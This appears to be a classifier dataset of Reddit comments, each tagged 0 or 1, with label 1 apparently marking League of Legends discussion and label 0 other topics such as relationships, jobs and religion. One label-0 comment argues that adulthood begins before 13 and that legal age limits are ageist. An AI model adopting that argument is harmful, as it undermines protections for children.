0	I totally understand what you mean, but what most people don't understand about me is that good guy imrealhighrightnow is not really a good person deep down, i just make a conscious effort to be a better person, so if i know I'm trying and you totally disregard it then i will stoop, i'll let you know who i really am. One thing that I've learned in my twenty and some odd years on this planet is that it doesn't matter how mild mannered or nice you believe someone is being toward you, once you let them get comfortable enough they may snap and disrespect you in an instant, and drop the load from a previous encounter on you, i make a conscious effort every waking day of my life to not do this to people because i don't like it when its done to me and the one person that i never want to consider a hypocrite is myself, When something like this happens to me i immediately think to myself "Oh so you think you can be a dick and i cant, i tried really hard to be nice and now your just gonna take advantage of this fact?" and its just down hill from there "petty me" comes out and it gets ugly, but its not always an immediate thing i always give people three chances to act right before i change, unless its just a passing situation where someone idk is just being a random dick in which I just become a dick too, or a physical situation in which I've been touched inappropriately touched (hit/pushed)  by a guy  (i dont hit girls i think its cheap) , in which case the reaction is immediate and unyielding.
1	That's a lot of fancy words for something that essentially boils down to the fact that there is an institute of scholars somewhere that decide what's acceptable in the english language and what isn't. It's their job and grammar isn't subject to anyone else's opinion on it. The field of science is also everchanging, but that doesn't mean that if I claim something it'll be true, unless it's reviewed by a panel of professional peers and found to be true by them.
1	I bought Evelynn two days ago and after starting 0-2-4 I was being raged at for "feeding" even though said feeding was actually roaming and setting up 4 kills. Then, because I "stole" 20 creeps from our Ashe in the first 20 min of the game, she decided to start attempting to surrender and sit in the well, spamming me for ruining the carry's farm. Shortly after I was 6-5-7, Ashe was still vomiting hate, and our jungle (2-8-5 and fail ganks galore) began to blame me randomly after he tried to "Backdoor" by walking straight down mid lane into their entire team.
1	I find Cass to be a fun and fairly powerful character, though i hesitate to play her in ranked over more forgiving characters.   One her main downfalls is that Pre-6 she has almost no CC (unusual for an Ap char) making her very susceptible to jungle/roamer ganks. A small mistake/death early can really screw up your game (kind of like eve, but not as serious).However, if you ward up and know approximate jungle speed of most jungles you can mitigate this fairly effectively and focus on what Cass does best: 1v1.   She is a kiting character, and does it better early game then anyone. I run flat AP quints, mpen reds, Mana regen/lvl yellows, ap/lvl blues. For starting items dorans ring or boots and 3 pots. If you can learn to predict/shepherd the opposing champion so that you land the majority of your Q's, you will be able to harass them out of the lane, and often get an early kill. The goal is to land 80+% of your Q's on the enemy champion. This is so key to Cass it cant be overstated. If Cass doesnt land her Q skill shot, she dies.  In terms of laning, she has a good auto attack animation for early game farming, and if you do well you should be able to go back to base and buy a NLR and boots at aproximatly 10-12 minutes (The goal is to have boots 2, dorans ring, and a deathcap by 18 minutes). With AP runes and a NLR, one Q will clear creep waves. Her Q + E combo will out dmg most other harass  and give you some lane dominance. If you get the 18 min DC, you will be able to kill most mids in Q E R E Q combo, and most side lanes even easier. Basically this is when Cass has to win the game, early deathcap snowballing into wins at dragon, ganks on sidelanes etc.   In terms of play, she is fairly unique and fun due to her kiting/skill shot focus, but can sometimes go against teams that just hard counter her. Mostly champions with multiple gap closers.
1	Comcast is the worst, cable companies are just bad. I've known people who have worked for them and I can tell you that as much as you would think it is the guy on the phone ruining everyone's day it's the company. They don't train them for actual support purposes and instead most of it is wasted on backwards customer retention policies (Repeatedly prompting a customer not to cancel their services or just generally annoying them into submission.) believe me it is hell for the guy on the other end as well.
1	When think how to get better, what I personally do is look at everything I just did, if im an adc and a gank happens in bot, I look at my position first, how far pushed was I, did I see the jungler coming, did the opponents play agressive when they are both half health under turret. that usually means a gank is incomming, was I in front of the creep line, was I chasing a kill when the gank happened, did mid just leave, where did the jungler come from. where you are exactly matters. Thats sort of a positional overveiw.   This next bit depends on how much cc and how much distance you can create as well as you ability to outplay your oppenent. In this case the amount of CC the opposing team offers is huge, if there is a jungle nautalis with support leona and varus adc, you are going to be locked up for days if you get hit by any ability in their kit, So did you know naut was coming and you didn't run to about a flash range from your tower, at least. for this example im going to assume your on blue side with a taric support, if it was a janna this would be much easier to dodge out of.   Do you have sight of both naut and leona, if you have.a general idea that's pretty good too, but knowing the range on their CC and staying outside of that range is vital. If your someone like ezreal just toss a Q    into the brush to check.   For almost all junglers if they miss their CC.and you are about mid way in the lane the gank will fail. So All you gotta do is DODGE IT. knowing champion abilities will,make you a better player offensivly and defensivly.
0	Yep. When I was in college we were pretty fucking considerate of our neighbors. They live there too. Everyone has a right to enjoy a quiet night's sleep without drunk frat boys making a ruckus.   Plus, you know, it's actually illegal to make noise past a certain time in most residential areas and you will get fined.
1	21 offense is rather questionable on Ryze   Past the 10% magic pen--ask yourself, 'What does Ryze get out of these masteries?   The physical damage and Armor Pen ones are obviously useless, and Ryze gets very little out of the AP (Blast/Archmage). Havoc is okay, I don't personally get it, but I can see it being a personal preference thing. Executioner is a pretty good spell, BUT you have to skill four points each into Blast/Archmage, which are next to useless for Ryze.   Is Executioner worth having those 8 essentially  wasted  mastery points? With Ryze being the tanky-type character he is, there's no reason not to skill into defense.   The problem I have with utility, as I mentioned above, is that going too deep into that tree, you have to waste mastery points on those weird support-type skills.
1	Easy. Carrying from support isn't hard, it just takes a different skillset. First and most important. You can't just be another body/walking ward. You have to get out there and make good decisions and follow those up with bigs plays. Don't be scared to try for the flash ult. Sometimes they won't work (they should most of the time or you need to re-evaluate when you do them), but that's okay. You tried to make a big play and it didnt work. Failed big plays as support usually just means the fight doesn't happen, it doesn't lead to lost teamfights too often. Last thing, you MUST keep your team mates objective focused.  If I had to guess the number1 cause of throws, it would be getting bloodthirsty I stead of getting objectives.
1	One small thing: dorans blades are better now early game due to them giving +5 hp per attack/hit instead of +3% lifesteal. But thats the bad thing also. +5hp per hit per dorans is better early game but falls of way faster now. Lifesteal, speak: percentage heal, scales way better the later the game goes. So 2 would reduce the cost effectiveness of your build from midgame on very hard.
0	It sounds like this was a Caesarian. Pooping is more likely to occur during vaginal birth. My wife had two c-sections and threw up during the first from the anesthetic.   Cute story though, the doctor pulled my son's head out as I'm looking over the cloth barrier and all you see is wife's belly with this tiny head sticking straight up out of it and then he let out this little sneeze onto the doctor's hand. This was one of the most amazing, relieving and happy moments of my life.
0	I worked in sales for an AT&T "reseller" that, at the time, was called AT&T portables that did this shit.   This is how my training went:  "If you add a,b, and c to the customers contract you get a total of $20 extra.  Plus they're free for the first 30 days and even if they cancel them after that you get to keep the money!  Now a lot of customers are going to want to not have it in the first place so it's better just not to tell them about it because it has to be on there for 24 hrs to take effect.  Now, sign this paper absolving us of any liability and promising not to do exactly what I just told you to do."  wink, wink   I ended up getting fired after 3 months despite record sales because I wouldn't lie to customers about that shit.  My co-worker, who got hired the same day, got fired the same day because he did lie to customers about that shit.  Our location was in a nearby mall that I frequented.  After only another month the entire staff had been switched out, 4 more months and it happened again.
0	I was once in a Skype chat with 2 girls and 3 guys. One guy goes to pee and takes his phone with Skype not muted. I realized the sound and said "haha I know that sound!" At which point everyone understood and the girls were saying "oh my god!" -
0	Depends on the reasoning though. Self-admitted patterns of promiscuity and infidelity? Yeah believe them. Inability to be emotionally available enough? Bit more of a grey area. One of the happiest couples I know is a girl who befriended a friend of mine who was battling serious depression. Helped and supported him through his recovery and they've been happy together for 9 years.
0	Only one way to find out.
1	I think Olaf can be a great counter pick against certain melee mids (Kassadin, Zed...), but going against against any ranged AP mid with Olaf is way too hard. You rely only on chaining Qs to get in melee range and harass while they can constantly AA you while you farm. You obviously need to max Q first which will eat your mana rather quickly.
1	Hi, let me start by saying welcome to the internet you must be new here... Honestly the internet is anonymous, meaning when people have the chance to be ass holes and bully/belittle people to make themselves feel better they will every time.   If you aren't having fun with the game then stop playing if it's a player problem do arranged 5s or use "/mute all" when the game starts. Not trying to be offensive in this reply but you seem really upset over something that more than likely came from some 14 year old kid. "You're shit" "That's why you're in bronze." Does this person realise they are also in bronze and were also part of the reason the game was lost?   reddit isn't the place to come to for counselling if things random people say over a keyboard hurt you so much you should probably speak to an actual person who can help you. Didn't mean to be overly harsh here but you seem like you just need some harsh words to make you realise this is the real world a lot of people out there are assholes.
1	But see that's kinda the problem, to be the top spots you need to continually prove it. You can't just win a spot and retire, in fighting sports you need to defend your title when challenged, prove that you're still the best. In this case, it's a number game, get x numbers, sit on couch.
0	My wedding was back in September, and it was great. We're in the process of buying a house now, and it's not as great.
1	I kept not being able to join games (kept crashing or getting the firewall message at loading screen). At first I thought it was my firewall, but games still crashed with my firewall turned off. Then they worked fine unless I turned my firewall on. So I don't know how my firewall was interfering...   Regardless, I got a different firewall and now it works fine.   However, don't know if my issue is the same as anyone else as it was only me out of 10 players that wouldn't connect.
0	Actually, strictly speaking from a biological sense, you reach adulthood when your physical development has reached the point where you're able to reproduce, which is usually before 13.  It's modern social quackery which demands unreasonably high legal age parameters which is little more than ageist nonsense made up by bitter old farts complaining about 'the youth of today being rebellious, rowdy and irresponsible'.  The truth is humans have always asserted their autonomy, bred and took risks as young as possible to survive as a species, since the young are inclined to lesser injury in like wounding events, and better able to bounce back from birthing and other injuries which do occur.  Old people self-aggrandising their natural uselessness is just another expression of solipsism and tyrannical social control which holds children back from developing their own sense of identity, self-worth and direction.
0	Crazy people will find their ways around this logic.   Once, when I was 18 years old, I dated a bat-shit-crazy girl from my high-school. We were on the way back from an amusement park with my friend and his girlfriend in the backseat. Nearly home at this point and doing the speed limit (45 MPH), a car begins passing us in the lane to our left, to which my then-girlfriend states "Oh my gosh, that car was going so fast!" I replied that it couldn't have been going any faster than ~50 MPH since it was a slow, gradual passing of our car. Her response: "No, Justin. The car passed us, so it  must  have been accelerating".   I, in disbelief, asked her to repeat what she had just said. Again, she claims that the car could not have been able to pass by ours had it not been accelerating.   Over the next 10 minutes, my best friend and I did all we could to help her realize that a car going 50MPH will pass a car at 45MPH, and that this is a problem of velocity, not acceleration. We even tried using a common, 3rd-grade-level word problem along the lines of 'Car A goes 20MPH for one hour, while Car B goes 10MPH for one hour; which car will travel farther?' "Well", she said, "there is not enough information to answer the question because you don't know the accelerations".   I tried explaining that neither car is accelerating because they are moving at the same speed throughout the entirety of the hour they are moving, but this simple concept continued going way over her head.  Having lost all patience at this point, I told her "What you're saying right now is stupid".
1	Look, it does not make sense what you write.   On one side you want to get diamond 2/1 but on the other side you seem to be fine with "just" the diamond boarder.   I can tell you, I had an unlucky 3 lose streak when I got to diamond 1 and thus destroyed my MMR. I kept getting only a few LP while losing way more.   It was eventually gone after I kept playing without caring about the LP.   There was a top front page post just yesterday which was from a challenger player telling people how to climb.   His
1	He said once he gets 4 items he's a monster, and once he gets tanky enough to survive, he will sustain back up. That's a late game team fight/split push counter.   Swain is helpless against Ahri in the early-mid game, without a lot of external help.   Ahri ranges: 880 (orb), 800 (fox-fire), 975 (charm).   Swain ranges: 625 (decrepify), 900 (nevermove), 625 (torment)   Good luck getting in range to use E/Q without getting a combo to the face, and good luck hitting a nevermove when the target isn't slowed.   Ok, so Swain can't do anything to Ahri early. What can Ahri do to Swain?   When Ahri gets a DFG, assuming neither of them got fed, Swain will be around an unstacked RoA, or worse. He will straight up blow up to the massive burst, something that has happened quite often in this game in particular.   One of the main reasons Swain isn't getting picked in competitive play is because if you don't do well in lane, then you'll have a really hard time coming back. You won't get tanky enough to survive in fights, and you won't deal enough damage either. He doesn't have a lot of play making mechanics. He just sits in the middle of the enemy team with his AoE, so if he just gets killed in an instant or ignored, there's not much he can do to come back.
1	The only recent changes he has seen were actually nerfs, mostly to his ranges. He actually lost 300 range and a fair amount of damage on his Q. They've been struggling to balance him.   The sad part is that according to [Elophant]( he's the least played hero of all time? I have no idea how far back or even how current their data is, but it's just sad. I like his concept and his kit, but his numbers are just weak.   He's also arguably the only irredeemably "ugly" champion. His lore, his model, his kit and his voice work have no humor or charm to them. While obviously as a player I have no problem with this, I'm sure lots of people just think he's gross.
1	Its funny you said this. I played AD bot with Vayne vs. their Sivir. I was getting outfarmed pretty hardcore, and then to kick me while I'm down, Soraka would heal creeps as I'm last hitting them... farming in the tower is hard enough as it is... but add in a random soraka heal and you really hate your life =P
1	Mods have control   Exactly. This place is managed by the mods and as long as that is true, the subreddit will be what their vision of it is. Nobody cares if most people disagrees(yes, I'm exaggerating). If you do, you can either 1. grab pitchforks and in general be an asshole to people that voluntarily mod hundreds of posts every day to keep people safe from [reddit-retardation]( and allow them to actually have a good general LoL related news hub, or 2. branch out, grab a few people and start your own place.   *By the way, most of huge subreddits turn INCREDIBLY BAD as an effect of not strict enough moderation. They quickly become circlejerks with 0 content(/r/gaming/ /r/gaming/ /r/gaming/). Is it what the community wanted? Absolutely, yes. In fact, 89 of it does(ratio of games/gaming subscribers). As you would say, it "brought the community together". Is it good? Holy shit no, it's terrible. /r/gaming is literally useless to people who expect actual gaming content. It's fast food to restaurants. More people want fast food, it doesn't mean it's better. It's hundreds of times worse. It's just easier.
0	Some background details: he was the only signer on a month to month lease. The house is four bedrooms, with four of us living there total so really he was screwing us over collectively $150 a month. The real kicker though is that the electric bill, had been going unpaid since he was pocketing that also. He managed to somehow rack up over $3000 in debt before they finally sent out the shutoff notice. The landlord showed up at our house because of this and is when we discovered we had been swindled. Thankfully the electric was under his name so he really only screwed himself there. The downside is everyone else is left suddenly evicted.
0	Like I tried to say: I dont know you and i dont know what kind of person you are, i have only read the comments.  I dont think ive made any assumptions or assertions about what kind of person you are, only about how the contents of your comments seem to me.  And some of it seems a bit judgmental.   Compare:  >you sound a little self-rightous to me   to   >[vegetarians are] self-rightous...[vegetarians are] obnoxious.   If you were referring anecdotally to your four shitty housemates, maybe that could have been clearer from the start.   Additionally, I am not sure which came first: your asshole vegan housemates or your awareness/ assimilation of the "standard vegetarian stereotype". Chicken or the egg?  Also: confirmation bias, as i mentioned earlier.  Which you did not respond to.   Did you notice that you misquoted my ' you sound self-rightous' statement as 'you are self rightous'?  That is not what I said, nor what I meant.  Careful with those 'being' verbs, because then we get into identity territory, and defensiveness.   I have tried to refrain from telling you what you "are," but I do not feel you have afforded nameless others the same courtesy.  Am I more clear? I am far mor interested in explaining myself than undercutting you.
1	To be perfectly honest i love facing Fiora as a top laner. Yes she becomes untargetable when she ults but thats why you learn how to counter play it. I personally like to take someone like a shen or lissandra against her and grab exhaust. When she dashes towards me i either e-taunt her right away as shen so that she takes a lot of minion aggro and i automatically win the trade or of I'm liss i w-stun her as soon as she comes in and then auto q auto kite. If I'm irelia, i e-stun then w and q away. If she comes close to me again i do the same, yes she may put dmg onto me but she can only kill you with her ult if you're low in health and if thats the case be prepared to exhaust her as soon as she dashes in because she will ult.
1	Guys, don't get me wrong, but, I'm kinda glad this rule has/will be kicked in. Such strong players from other continents such as (the entire Asian region) would just move to another region and use their strength over the somewhat stereotyped 'weaker regions' to gain a spot in Worlds where they may not have been able to do that in their home region. Eventually, the entire NA/EU scene could have just been filled with more Asian Teams hoping to get a shot at worlds where in reality, they may have never have been able to win in their own region.
0	My professor had a very good theory as to how matter came into the universe and its extremely difficult to explain without looking like an idiot.  Basically, we don't know for sure. But its just as logical if not more to theorize possible ways the universe came into being.  One of my other professors theorized that our universe was actually inside a black hole.  The one my professor i initially mentioned and My favorite theory is the dimensional collision theory.  That multiple dimensions collided(because they move in wave-like shapes) and the result was the big bang(or something similar).  Just a theory not an absolute.   If god started life and evolution, why bother with starting at such an extreme time? If god is omniscient it means he knows everything, including the future. That means everything is predetermined by him and that free will is just an illusion(everything you do has already been planned to happen. Meaning he failed to give us the one thing his 'son' died for, Jesus knew this when he was dying on the cross 'father why have you forsaken me' and later saying it was in his plan).  But -- it also means he knew that evolution would shake the foundations of the church and lead his creation astray. You can see a common theme throughout religion that as Hitchens put it, 'we were set to fail' (Adam and Eve had no choice not to eat the apple).  So why start time, make it billions of years without humans, have humans evolve through an extremely difficult process where 98% of all animal species go extinct(and humans almost did!), and then say humans were his plan all along and he created one and then the other out of a rib?  This also ignores how flawed humans are medically(we're walking medical disasters) and ignores how he put everything in our bodies in awful placement despite the bible saying humans were created in gods image. I believe Dawkins said something along the lines of 'gods image? We must have been designed by an idiot' what about the earth? Why make it so hostile when its very within his reach to make it safe(geological & astronomical disasters are what I'm talking about).  Free will? He made it dangerous, its just as logical(if not more logical) to make it safe for his 'favorite creations'   It doesn't make sense to give credit to a divine being for how flawed our universe is. How flawed life is. How flawed we as humans are. Why make outer space at all? Why make other planets if its impossible to even set foot near them?  Why make 97% of our water salt? 3% usable? Even less of that isn't actually in icebergs? Why create the sun, make it spew radiation, give us cancer, and say 'pray to me' when answering prayers breaks free will(if we ever had any, which we didn't from the start).  Why make the planet have no life for billions of years and then have life begin? Why make the universe expand?
0	I live in a resort town and in the winter the cops get bored as fuck.  Sooooooo my sister's boyfriend (who was a waste of life) supposedly was dealing drugs.  I get home from my girlfriend's house one night and there are fifteen cop cars surrounding my house and cops in swat gear, assault rifles, and night vision goggles.  I pull into my drive way, asshole detective walks up to my car asks me if i'm [name] I say yes he goes over radio " we have [name]" pulls ME out of car and puts me in handcuffs all the while not telling me why I'm in handcuffs and why they are surrounding the house.  Nothing not a fucking word.   They bring me in the house. I see my mother in handcuffs in the kitchen on a chair and I ask what's going on and she says [boyfriend] is selling drugs. They separate us screaming at everyone to shut up.  They bring me into bathroom of house and corner me with two detectives one in swat gear, machine gun, whole deal and the other one I went to high school with. He knows me, he knows my family, he knows my friends, he knows I'm not into any of this shit.  Still they press me like a criminal (totally innocent until proven guilty, right!).  They confiscate phones, laptops, hard drives, notebooks.  They put us in separate cars drive us to the station we all the spend the evening in holding cells all the while they are ripping apart our house looking for drugs.   They found a fucking oz of weed! That's it! 1 oz of pot!   They release everyone. Court summons for my sister and [boyfriend]. They tell us [boyfriend] who is responsible for this shit has to stay with us because it is part of a bigger undercover investigation.  I made him leave.  Our computers and what not are supposed to be released in the morning with us. So I go down to the police station the next day to get my computer back. This ends with me and the asshole detective in a shouting match in the lobby of the station.  I leave, fuming.   I found out later, talking to my mother, that asshole high school alum cop was the first in. He didn't knock and announce. He was wearing a black hoodie, screaming, and pointing a handgun in my mother's face.   My sister who was going to school for nursing, had a 3.8, now had a drug charge on her record.  That's a big no no working in a hospital, because , you know, pot is just like having heroin or pills or meth.   The saving grace is that waste of life boyfriend is out of the picture.   The following weeks consisted of getting pulled over at least once a week sometimes twice, because "did i see you see on your cellphone? also any news on [boyfriend]?"   I am instilled with a violent hatred for law enforcement because of this. Excessive waste of time and money that could have been avoided by doing better detective work.  What do you expect from someone who barely graduated high school, and was taught to be a cop by former cops. Group thought leads to further galvanize that group thought.
1	But you can get everything you need to play without putting any money into it, that means it's free, right?" You ask. No, it doesn't.   Yes, yes it does. That is pretty much the definition of free.   > Unlike a Free to Play game, you're not just picking LoL up and putting it down if you decide you don't want to invest after 10, 15 hours.   Yes, you can do that. Many people do.   > League could double or triple that time investment, easily, for new players to decide they don't like it.   And? When you start playing you're playing because you like the game, or because you're on the fence / still trying it out. No one spends their first 10 hours of LoL grinding, they are just  playing the game . For free. By your standard no game content that takes time to unlock - like say the next level, end boss, good loot etc - is free.   > What isn't fine is when you have 32 million players and I'd wager approximately 1/9 or 1/10 are toxic asshats (that's about 1 per game), because you dumped the moderation duties on the community's shoulders with the tribunal.   Toxicity has nothing to do with tribunal being crowd sourced, it has to do with Riot choosing an extremely lax standard of moderation, through the fact that it is really fucking hard to actually get to the tribunal.   > What isn't fine is when everyone trumpets that you've gotten VISAs for your esports players, but you're losing millions hosting your tournaments (The Staples Center cost Riot somewhere around 2 million in losses, if I remember correctly - too bad that 2 million didn't go towards maintaining your community and servers instead!),   Riot's investments into esports are all about growing the customer base and fanloyalty in the long run. It's basically nothing but marketing.   > and then you turn around and promote a competitive hierarchy to go along with it that's probably caused more grief and stress than the 1st World War.   You should probably stop playing this game.   > What isn't fine is when you're raking in profits like never before, but still try and justify prices on EVERYTHING going up, the logic behind which doesn't make any sense.   All companies set prices to maximize profits.   > What isn't fine is when you're going to tell me that you had absolutely no idea that the game was going to explode this hard, when that is exactly what you planned for it to do.   Every single game company ever would have loved to have their game explode like LoL did, but you  cant  actually plan to have it do that (if you could, then everyone would do it) and you can't invest in massive infrastructure ahead of time in case you succeed, because you can only afford that if you do succeed, which you probably wont. Riot have done a lot of things right to get where they are, but they also got extremely lucky.   > however, unlike a monetary investment, you cannot cut your losses and go do something else - you cannot get any of your time and money back.   Cutting your losses doesnt mean getting (part of) your investment back, it means not losing more from this point forward, which you  can  do, just walk away.   > And to the point, I complain because unlike in a market, where you can "cash out" if your investment seems shaky, or you lose confidence or something like that, you cannot "withdraw" your investment from League.   This is basically the definition of  not an investment .
0	I see what you mean, but rather I had meant that being overweight and smoking are both extremely unhealthy. I should have elaborated on that, sorry. I mean there is truly a difference between overweight amd healthy. For example, take two people 6' 210 lbs. One is mainly muscle, one is mainly fat, there will be a considerable difference in health and fitness. Also, being dangerously underweight would also be considered equally dangerous.
1	At risk of sounding like a whiney bitch I shall elaborate.   Every time I come to this subreddit I know exactly what I'm going to get. There will be links to "pro/awesome/funny/epic" plays, some diamond ELO players who think they're the shit, people who do an in depth analysis on a champion and expect riot to respond to them (like this guy) and fan art. There is almost no OC (original content) and by that I mean something different than the norm, something that this subreddit hasn't seen a billion times before. Here's what I'll probably get grilled for bitching about. Couple days ago I posted a picture in form of a picture post. It reached the front page within a couple hours but it was against the rules to make an image post like that. So I reposted it, in a self post, so it followed the rules. Again, reached front page within a couple hours, has like 600 upvotes. Then the mods remove it due to it being a "low quality" post. I mean, fine, it was just a picture of a conversation I had with my friend (no it wasn't faked) so, no it took no effort on my part other than taking a screen shot. But it was funny and a good post that made the front page twice, so who are the mods to decide what the hell a "quality post" is when the community clearly liked it? It was no less original than posting the link to a youtube video. That's why I hate this subreddit.
0	I went to graduate school before I decided I wanted to get into medicine, I'm on year 7 and I'm only an MS1.
1	I should have given the community more credit, I suppose. I assumed the subreddit was a good representation of the LoL players, but now that I think about it that's stupid, but even then I didn't know a lot of these things (not top player and been years since i've seen jayce). I'm pretty new here :D. Perhaps it wasn't executed properly, but my plan was to talk about the things that would make bruiser jayce viable, because I don't think people ever put his abilities in that context. In the future I'll put a title or mention what the list is and say to skip to
0	It is to my understand that it's the difference in optimization Youtube's servers and Pornhubs. Youtube's servers are more optimized to search for videos and query them, because youtube heavily relies on searching so they put more focus into that. Whereas Pornhub knows not a lot of searches are submitted and it is less important, so they optimize for rendering the videos. Ever wondered why searching on Pornhub is so slow?
0	About 8 years ago, the high five was struggling for life. It seemed that no one wanted to make honest-to-goodness, palm-to-palm contact with another person. The fist bump was in vogue, and still remains a viable social interaction to this day.   But, oh, how I longed for that almost supersonic crack of skin striking skin. So I took it upon myself to revive this ancient ritual of greeting and celebration.   I began high-fiving people as frequently as I could. My palms ached from the many slaps I gave to friends, family and strangers. When it became evident that the High Five was teetering on the edge of extinction, to the point where I could no longer ask for a High Five, but had to ask to "slap hands," I knew that my mission was of the highest order of nobility and selflessness.   Through my diligence and the willingness of so many people to engage in good old human contact, with complete disregard for the swine flu and SARS, the High Five has rightfully resumed its place among humanity's greatest achievements. Alongside penicillin and Auto-Tune, and the 1980s masterpiece film "Over the Top," the High Five shines as a beacon of hope for so many, once again.
1	I disagree about the Summoner Spells. there is less poke and more fights on PG than on SR, because the distance between the towers is longer, so you have more room to fight. Therefore spells like exhaust are great as well. Heal sucks, because people always stack it instead of waiting, high CD and the 20% heal reduction.   Ignite is ok as well, even a must have vs ap yi etc.
1	Ill just answer number 5, back in the day i was sitting at 800 elo (s2) and used to play every role, then i started a smurf acc and only played top, when i reached lvl 30 i lost a lot of placment matches, so i went back to my main, an i got 1200 in no time, after that i took over mid lane, cuz i think you have more impact on the game, and i watched A LOT of streams, i picked up 2 champs of the current meta (this is very important, you can be godlike witch a champ, but you can be beated by someone bad with the right champ) and got gold in no time
1	4 Weeks is a long time in League of legends speak. That's two patches, and sometimes patches make HUGE gameplay shifts. Your ranked Elo is supposed to be a reflection of your current skill at the game when you try your hardest (Not saying that's what happens in ranked, but that's what it's supposed to be). You have an entirely separate normal elo that may not be anywhere near your ranked elo, so it's impossible to say that because you played a normal game and won/lost/whatever, the same thing would have happened in a ranked game.   If you want an analogy, it's like saying that you ran in the olympic qualifiers for the marathon, and you qualified. If you then spend the next 3 months competing in races against high schoolers, who are a completely different skill bracket, your skills will not be as good as if you had been competing against other olypmic-caliber athletes in the interim. So your Elo rating is adjusted to reflect this.
1	I never been at elo hell but I think to get better, you should try to excel at one strong champion and learn the game mechanics better with that one character, so learn how to CS and ward and properly poke to just get better in the game. Like my main now is Annie and I do not lose my lane very often against most match ups. I even had an alt account and got to gold rating by just playing Annie and if the team would not give me mid I'll just support and I ended up 22/11 for my rank games.   I tell this to all my friends because I think by learning only one character really well, you start knowing all you can learn from your character and you can start learning more about the game. The thing about learning how to play your champions and then learning the game mechanics at the same time is making people learn less quickly about the game and essentially not becoming better.
0	Brief story time. Getting married in August, so pretty much all money leads to that, but here is the build up to even making that money. January 2nd of 2014, my office job fired me (salaried at 38k with a weekly direct deposit). Felt like I was in shambles. Here I am with a music degree, playing in a band, singing at a church on the weekends (despite not being religious at all) and teaching students on in the moments I had when I had that job. 2 months of unemployment/looking for something like the office job that I had when it hit me. I need to be a professional musician for a while. Now I make 500 a week teaching privately and out of an after school music hub (not franchised, totally independent). I pay all of my bills on time without a problem (which includes student loans, car payment, cell phone, Internet, and occasional credit card). Here is the only catch. I live rent free with my fiancée above her grandfather, but it's far from a cake walk. There is work to be done and I help him with whatever time I have/whenever he needs something from me. And we aren't deadbeats. We have a great relationship with him and he is a 92-year-old fountain of knowledge. All of this adds up to a very happy lifestyle. Life is good and your dreams outside of an office can be obtained if you just
1	Well here is the thing. A lot of people get pissed if someone on their team is feeding, people getting pissed usually leads to flaming. This gets the game no where, instead try to tell the player what he is doing wrong. I know that a lot of people live under the asumption that 99% of the people on the internet is idiots, but hey atleast try to help out. Also IE if it is the laning phase that is failing for a person, try help him out. Ask him if he wants to switch lane, or get some ganks going in his lane. It's ofc important to do this BEFORE the enemy have been fed a lot.
1	All i read is people being disappointed with the stomp. Till game 3, it was actually intense for me. Game  2 being so close. Royal actually regained some confidence in the 2nd game. They won a teamfight being down in gold. For a moment it looked like SKT were shaking. It was known that Royals were a team that could turn the tide of the game very quickly with just one tf. After game 2 i actually expected Royal to get back, they were getting closer and closer in the first 2 games. So i admit, the 3rd game was kinda sad, RC tilted, made mistakes, were too scared. I don't know they just were not as confident. What i found very lacking is what happened after the match though. Like nothing happened. Everyone said, yeah we ae done with that lets go.
1	The main difference between Javelin Toss and other siege spells like Mystic Shot and Bouncing Bomb is the frequency and intensity of damage. Mystic Shot/Bouncing Bomb apply pressure (you don't want to get hit) and are harder to dodge, but require a lot of hits to push someone out of the fight. Javelin Toss applies pressure in a more intense way. Yes, they are easier to dodge, but if one spear connects you can zone that person out and force an advantageous fight. A decision needs to be made to change Javelin Toss into a lower-impact but easier to use spell (thematically makes more sense IMO) OR keep it as-is and balance her kit around a 1500 range nuke.
0	I was a nice guy back in high school. I never realized how much I fucked up with girls because I think I was in love with the idea of having a girlfriend and never getting to appreciate that I was talking to someone. I can't lie and say that I never got upset when a girl said no, because being rejected sucks. I also never paid attention to girls who did show interest in me since I "didn't want them" and aimed higher than something more meaningful.   You don't realize how much of an asshole you are until you're older and it hits you that maybe you put too much stock into what other people thought, or you're so up your own ass about what you'd like that you could have had it with someone else. I got lucky since I found someone who was my type and thensome. Been married for 2 years. When you stop trying to "be nice" and be yourself, it works wonders. These "nice guys" need to realize this, but they have to come to that realization on their own. I can't get upset at these guys because they're not at that point where they understand there's more to relationships than being what you think someone wants you to be. I can, however, get mad at guys that think it's cool to slander a girl's reputation or make her feel like shit because you didn't get what you want. Those guys have a lot of growing up to do.
0	I'm in a similar situation. Although we weren't dating yet for the past couple of months I've been hanging out with this chick from work (mistake #1). Things seemed to be going pretty good. She would tell me how she appreciates everything I do and how special I make her feel. And when we would go hang out with a group of people she told me the only reason she would go is because of me.   The last time we hung out she tells me how she's not seeing or talking to anybody else. And after we left our friends she called me and we talked on the phone from midnight to 2:30 in the morning. We joked about getting a hotel room the following weekend, but by the end of the phone call she said she couldn't wait so we got one the next day.   Then every time I tried to make plans with her something came up. Come to find out she's been going  dates with another guy from work. I asked her about it and she flips out saying no she hasn't been going on dates with anyone and if she has its none of my business what she does in her free time because we're only friends.  So now when I see her at work I joke around asking if she's talking to me yet and she says she's still to pissed yo talk to me.
1	While people are loading into the game, the server (and clients) are performing synchronization checks among other types of communication. If you were to add messaging, it would disrupt and slow these actions. Additionally, it wouldn't be guaranteed that everyone on your team would receive any messages sent. On the reverse, you might not receive all of the messages sent by other players, which I would find more annoying than not being able to chat at all.
1	I absolutely hate when people don't communicate in the chat. If you're going to play a team game and you don't know what speaking is then that's already a bad start. I respect that sometimes people don't know all roles perfectly (eg, I can jungle but obviously I'm not going to be extremely good at it because my mains are ad and support) but if you want a role explain it nicely and I don't mind jungling if you really want support/ad and you're first pick. It's EXTREMELY hard to make a good team to counter or to have some synergy if people don't talk.  -.-'
1	The other day the pvp client froze/crashed on me mid-champ select. I thought I had been dodged out, but after logging back in (about 20 minutes later due to so many "server is busy" errors for no reason), It had actually loaded me into the game and I was afk for 20 minutes costing the team the game.
